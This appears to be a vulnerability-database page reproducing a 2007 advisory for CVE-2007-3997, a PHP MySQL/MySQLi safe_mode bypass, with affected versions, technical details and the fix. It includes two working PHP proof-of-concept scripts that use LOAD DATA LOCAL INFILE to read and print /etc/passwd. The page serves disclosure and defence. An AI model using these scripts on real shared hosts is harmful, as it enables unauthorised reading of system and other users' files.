Vulners
Lucene search
PHP 4.4.7/5.2.3 - MySQL/MySQLi 'Safe_Mode' Bypass
| Reporter | Title | Published | Views | Family All 31 |
|---|---|---|---|---|
 | PHP <= 4.4.7 / 5.2.3 MySQL/MySQLi Safe Mode Bypass Vulnerability | 10 Sep 200700:00 | – | zdt |
 | php -- multiple vulnerabilities | 30 Aug 200700:00 | – | freebsd |
 | CVE-2007-3997 | 4 Sep 200718:00 | – | cve |
 | CVE-2007-3997 | 4 Sep 200718:00 | – | cvelist |
 | Moderate: php security update | 20 Sep 200700:00 | – | oraclelinux |
 | EUVD-2007-3981 | 4 Sep 200718:00 | – | euvd |
 | PHP 4.4.75.2.3 - MySQLMySQLi Safe_Mode Bypass | 10 Sep 200700:00 | – | exploitpack |
 | K31530542: PHP vulnerabilities CVE-2007-1777, CVE-2007-3997, CVE-2007-4657, CVE-2008-3658, and CVE-2008-3659 | 21 Feb 202318:34 | – | f5 |
| SOL31530542 - PHP vulnerabilities CVE-2007-1777, CVE-2007-3997, CVE-2007-4657, CVE-2008-3658, and CVE-2008-3659 | 20 Oct 201600:00 | – | f5 |
 | FreeBSD : php -- multiple vulnerabilities (71d903fc-602d-11dc-898c-001921ab2fa4) | 14 Sep 200700:00 | – | nessus |
10
Affected Products:
<= PHP 5.2.3
<= PHP 4.4.7
Authors:
Mattias Bengtsson <[email protected]>
Philip Olausson <[email protected]>
Reported:
2007-06-05
Released:
2007-08-30
CVE:
CVE-2007-3997
Issue:
A vulnerability exists in PHP's MySQL and MySQLi extenstions which can be used to bypass PHP's safe_mode security restriction.
Description:
PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML.
Details:
By using MySQLs LOCAL INFILE we could bypass PHP's safe_mode security restriction. An important thing here is that we can't rely on the shared hosts MySQLds local-infile=0 option. This because of it being a server option, so it will not have any effect on the client. To disable this option for MySQL we need to compile libmysqlclient with --disable-local-infile, or remove the CLIENT_LOCAL_FILES flag while connecting. PHP does this when open_basedir are in effect but lacks a check for safe_mode.
For MySQLi compiling with --disable-local-infile won't help because we could just reenable it with mysqli->options(MYSQLI_OPT_LOCAL_INFILE, 1);
Proof Of Concepts:
MySQL:
<?php
file_get_contents('/etc/passwd');
$l = mysql_connect("localhost", "root");
mysql_query("CREATE DATABASE a");
mysql_query("CREATE TABLE a.a (a varchar(1024))");
mysql_query("GRANT SELECT,INSERT ON a.a TO 'aaaa'@'localhost'");
mysql_close($l); mysql_connect("localhost", "aaaa");
mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a");
$result = mysql_query("SELECT a FROM a.a");
while(list($row) = mysql_fetch_row($result))
print $row . chr(10);
?>
MySQLi:
<?php
function r($fp, &$buf, $len, &$err) {
print fread($fp, $len);
}
$m = new mysqli('localhost', 'aaaa', '', 'a');
$m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
$m->set_local_infile_handler("r");
$m->query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a");
$m->close();
?>
Impact:
This issue could have major impact on shared hosting systems.
Solution:
Upgrade PHP to 5.2.4 or 4.4.8
# milw0rm.com [2007-09-10]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Sep 2007 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 27.5
EPSS0.32052